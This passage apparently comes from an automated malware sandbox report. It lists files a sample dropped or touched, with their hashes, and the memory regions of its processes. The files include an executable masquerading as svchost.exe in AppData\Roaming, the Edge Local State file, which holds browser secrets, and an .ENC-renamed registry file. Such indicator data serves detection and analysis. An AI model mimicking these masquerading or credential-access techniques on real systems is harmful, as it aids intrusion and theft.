                                                                                                          b5f15e8adfebbccdd7cf7551fa7ad8c7ae0d0b1aee02d091d897548ce7df3ad1af0990e001b27a6036cb3c1c1d1a1c0943a9dd9997092fbf0618319a6d51cef6

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                          Filesize

                                                                                                          10KB

                                                                                                          MD5

                                                                                                          e571824097117faed851f5127986ccd1

                                                                                                          SHA1

                                                                                                          ad2440e1d90cfcfff19259528659209e50f13f3a

                                                                                                          SHA256

                                                                                                          329e1e10b0fea2a3872b42eef8b9921848ad8d9f1af8d85f531c4e1e6307743a

                                                                                                          SHA512

                                                                                                          68e95dcfbe1950c26399eb7352ca83bf9e9e7b41ab0029b0b61aa51cc364038193be38a1127c4acef875755b9153ecf18797ebb2862609c7b1976576f817a839

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          944B

                                                                                                          MD5

                                                                                                          eaf2949b53de8c4a84042633ab9545d4

                                                                                                          SHA1

                                                                                                          882fa652ca3ca05f93f383057b9937cf8bff704e

                                                                                                          SHA256

                                                                                                          42e02d0d8a7ea1446fadc3a43297652904bb326b3d2d961d83783fb0b47d3d50

                                                                                                          SHA512

                                                                                                          5da2d97fe178b9764c51599f1410f0bb41f5bd7dd37b027f00b378a5d12be57b72dcf9e4800e765384fbf17c784876b5783b08fa940d1db44cfb928ea391bb00

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          1KB

                                                                                                          MD5

                                                                                                          b57cfae2d0620c10553e4e4f73b7650b

                                                                                                          SHA1

                                                                                                          ec063d9eb1143325fededb31e81d37c7bdaec653

                                                                                                          SHA256

                                                                                                          add865a14d81271f8dbefe8f5d533ffff3101e5f2d9ece3e8e9e2f793ffc96c1

                                                                                                          SHA512

                                                                                                          c41b58bf0120b74941c092815dd6caa8b6704c8ad6d9619e02ae86b6f856434c39d41dfa228c449b56b83d5eca4ddf9b535f184e0fb2d2053a3a3327d6f75cab

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          944B

                                                                                                          MD5

                                                                                                          59d97011e091004eaffb9816aa0b9abd

                                                                                                          SHA1

                                                                                                          1602a56b01dd4b7c577ca27d3117e4bcc1aa657b

                                                                                                          SHA256

                                                                                                          18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d

                                                                                                          SHA512

                                                                                                          d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          944B

                                                                                                          MD5

                                                                                                          a1964ee25680a8911fd1e786038b2f56

                                                                                                          SHA1

                                                                                                          3c0e5d738f1abf573ef393e4a56e15be9166c975

                                                                                                          SHA256

                                                                                                          d430fe773038ab5d0fad7af413c6c0c2803eb3251e78ccc4795acbca70819c0f

                                                                                                          SHA512

                                                                                                          9a6baa704273cbf179990b153ab29cd02a32609e829b63fa4dc7fa69d4ad2f9ddc424eb394fcfd92a68f2c3b0a9989cd10e89bc7e62175467f9fd9c67f066acf

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          944B

                                                                                                          MD5

                                                                                                          cc1b1b284341aca94aa5d2d1202f7033

                                                                                                          SHA1

                                                                                                          7aabeb7626baf58b328b42a1937ac23c030b9c22

                                                                                                          SHA256

                                                                                                          58af901ba98a03706404453943c2a9aef41b8ee9ed0fd1dfc3c9c745939c7797

                                                                                                          SHA512

                                                                                                          6b926c6f64cf6abb1bc3f6b8db3a9a6102f415e90fa7cdd62f7bc8c167c362da31aecba7d17317ff6dcd9829d442c1233ac03db3f596a6bacabbd804c0b87395

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_31mpxbwu.uka.ps1

                                                                                                          Filesize

                                                                                                          60B

                                                                                                          MD5

                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                          SHA1

                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                          SHA256

                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                          SHA512

                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                        • C:\Users\Admin\AppData\Roaming\svchost.exe

                                                                                                          Filesize

                                                                                                          61KB

                                                                                                          MD5

                                                                                                          6be4a7c074dc461c8c9e74bedaf5c41d

                                                                                                          SHA1

                                                                                                          0535964d5cf5e58c7608722d65767c9a33bda831

                                                                                                          SHA256

                                                                                                          c3e67eaa81c08b734fd310644df2e2777e86fb89e37eeaa5a5f542528f4cf4f3

                                                                                                          SHA512

                                                                                                          d488d4656709a49a680260c7db653744795d5050f5eaa4449e2aa214056f2a5bb89c66a3e87a23aba9f42582ff2a03d7d11be32333ffe22591dc23b8d1227d6c

                                                                                                        • C:\Users\Admin\AppData\Roaming\svchost.exe

                                                                                                          Filesize

                                                                                                          61KB

                                                                                                          MD5

                                                                                                          6be4a7c074dc461c8c9e74bedaf5c41d

                                                                                                          SHA1

                                                                                                          0535964d5cf5e58c7608722d65767c9a33bda831

                                                                                                          SHA256

                                                                                                          c3e67eaa81c08b734fd310644df2e2777e86fb89e37eeaa5a5f542528f4cf4f3

                                                                                                          SHA512

                                                                                                          d488d4656709a49a680260c7db653744795d5050f5eaa4449e2aa214056f2a5bb89c66a3e87a23aba9f42582ff2a03d7d11be32333ffe22591dc23b8d1227d6c

                                                                                                        • C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC

                                                                                                          Filesize

                                                                                                          16B

                                                                                                          MD5

                                                                                                          7b91fc99370d3f551e44ee20b70079aa

                                                                                                          SHA1

                                                                                                          fcecb1af767d2ded445e30184cb000bbc6b5f254

                                                                                                          SHA256

                                                                                                          99f1366f9dd9726a5f2aeb34c43981d8aa7342577869261824a724a45c3e7582

                                                                                                          SHA512

                                                                                                          3cd72840cb7f5c25c0d3db403cf0d6d570d50c2d0d745c84695d54be0a74023eadc5587b084e6efaee6aa7f9566d7c84836d04957a72870ab359ed250480ad5d

                                                                                                        • memory/1080-77-0x00007FFB375C0000-0x00007FFB38081000-memory.dmp

                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/1080-79-0x00007FFB375C0000-0x00007FFB38081000-memory.dmp

                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/1912-64-0x0000021F79160000-0x0000021F79170000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/1912-63-0x0000021F79160000-0x0000021F79170000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/1912-62-0x00007FFB375C0000-0x00007FFB38081000-memory.dmp

                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/1912-67-0x00007FFB375C0000-0x00007FFB38081000-memory.dmp

                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/2160-144-0x0000025F8FA60000-0x0000025F8FA70000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/2160-146-0x0000025F8FA60000-0x0000025F8FA70000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/2160-149-0x00007FFB375C0000-0x00007FFB38081000-memory.dmp

                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/2160-141-0x00007FFB375C0000-0x00007FFB38081000-memory.dmp

                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/2160-145-0x0000025F8FA60000-0x0000025F8FA70000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/2160-143-0x0000025F8FA60000-0x0000025F8FA70000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/3308-163-0x0000000005E00000-0x0000000005E22000-memory.dmp

                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/3308-158-0x0000000002FD0000-0x0000000003006000-memory.dmp

                                                                                                          Filesize

                                                                                                          216KB

                                                                                                        • memory/3308-159-0x00000000752A0000-0x0000000075A50000-memory.dmp

                                                                                                          Filesize

                                                                                                          7.7MB

                                                                                                        • memory/3308-174-0x00000000060F0000-0x0000000006444000-memory.dmp

                                                                                                          Filesize

                                                                                                          3.3MB

                                                                                                        • memory/3308-169-0x0000000005EA0000-0x0000000005F06000-memory.dmp

                                                                                                          Filesize

                                                                                                          408KB

                                                                                                        • memory/3308-160-0x0000000002FC0000-0x0000000002FD0000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/3308-162-0x0000000005690000-0x0000000005CB8000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.2MB

                                                                                                        • memory/3308-176-0x0000000006570000-0x000000000658E000-memory.dmp

                                                                                                          Filesize

                                                                                                          120KB

                                                                                                        • memory/3308-181-0x00000000752A0000-0x0000000075A50000-memory.dmp

                                                                                                          Filesize

                                                                                                          7.7MB

                                                                                                        • memory/3308-177-0x0000000006A00000-0x0000000006A4C000-memory.dmp

                                                                                                          Filesize

                                                                                                          304KB

                                                                                                        • memory/3308-161-0x0000000002FC0000-0x0000000002FD0000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/4060-72-0x0000000000D20000-0x0000000000D30000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/4060-804-0x0000000000D20000-0x0000000000D30000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/4060-33-0x00007FFB375C0000-0x00007FFB38081000-memory.dmp

                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/4060-120-0x00000000024D0000-0x00000000024D8000-memory.dmp

                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/4060-81-0x000000001C8C0000-0x000000001C9DE000-memory.dmp

                                                                                                          Filesize

                                                                                                          1.1MB

                                                                                                        • memory/4060-73-0x000000001BB80000-0x000000001BB8C000-memory.dmp

                                                                                                          Filesize

                                                                                                          48KB

                                                                                                        • memory/4060-80-0x0000000000D20000-0x0000000000D30000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/4060-121-0x000000001C350000-0x000000001C35E000-memory.dmp

                                                                                                          Filesize

                                                                                                          56KB

                                                                                                        • memory/4060-178-0x0000000000D20000-0x0000000000D30000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/4060-0-0x0000000000390000-0x00000000003A6000-memory.dmp

                                                                                                          Filesize

                                                                                                          88KB

                                                                                                        • memory/4060-150-0x000000001CD50000-0x000000001CD66000-memory.dmp

                                                                                                          Filesize

                                                                                                          88KB

                                                                                                        • memory/4060-131-0x0000000000D20000-0x0000000000D30000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/4060-627-0x000000001C250000-0x000000001C25C000-memory.dmp

                                                                                                          Filesize

                                                                                                          48KB

                                                                                                        • memory/4060-1-0x00007FFB375C0000-0x00007FFB38081000-memory.dmp

                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/4060-74-0x000000001CD80000-0x000000001D2A8000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.2MB

                                                                                                        • memory/4256-9-0x0000028ACEA10000-0x0000028ACEA20000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/4256-2-0x0000028AB63A0000-0x0000028AB63C2000-memory.dmp

                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/4256-3-0x00007FFB375C0000-0x00007FFB38081000-memory.dmp

                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/4256-10-0x0000028ACEA10000-0x0000028ACEA20000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/4256-15-0x0000028ACEA10000-0x0000028ACEA20000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/4256-18-0x00007FFB375C0000-0x00007FFB38081000-memory.dmp

                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/4340-46-0x00007FFB375C0000-0x00007FFB38081000-memory.dmp

                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/4340-52-0x00007FFB375C0000-0x00007FFB38081000-memory.dmp

                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/4340-50-0x0000017590500000-0x0000017590510000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/4340-49-0x0000017590500000-0x0000017590510000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/4340-48-0x0000017590500000-0x0000017590510000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/4572-154-0x0000000004CB0000-0x0000000004D42000-memory.dmp

                                                                                                          Filesize

                                                                                                          584KB

                                                                                                        • memory/4572-156-0x00000000053A0000-0x0000000005944000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.6MB

                                                                                                        • memory/4572-601-0x00000000752A0000-0x0000000075A50000-memory.dmp

                                                                                                          Filesize

                                                                                                          7.7MB

                                                                                                        • memory/4572-608-0x00000000752A0000-0x0000000075A50000-memory.dmp

                                                                                                          Filesize

                                                                                                          7.7MB

                                                                                                        • memory/4572-157-0x0000000004FE0000-0x0000000005046000-memory.dmp

                                                                                                          Filesize

                                                                                                          408KB

                                                                                                        • memory/4572-155-0x0000000004D50000-0x0000000004DEC000-memory.dmp

                                                                                                          Filesize

                                                                                                          624KB

                                                                                                        • memory/4572-153-0x00000000752A0000-0x0000000075A50000-memory.dmp

                                                                                                          Filesize

                                                                                                          7.7MB

                                                                                                        • memory/4572-152-0x0000000000270000-0x0000000000280000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/4588-20-0x00007FFB375C0000-0x00007FFB38081000-memory.dmp

                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/4588-21-0x000001385A560000-0x000001385A570000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/4588-36-0x00007FFB375C0000-0x00007FFB38081000-memory.dmp

                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/4588-34-0x000001385A560000-0x000001385A570000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/4588-32-0x000001385A560000-0x000001385A570000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/5660-595-0x00007FFB375C0000-0x00007FFB38081000-memory.dmp

                                                                                                          Filesize

                                                                                                          10.8MB

                                                                                                        • memory/5660-582-0x00007FFB375C0000-0x00007FFB38081000-memory.dmp

                                                                                                          Filesize

                                                                                                          10.8MB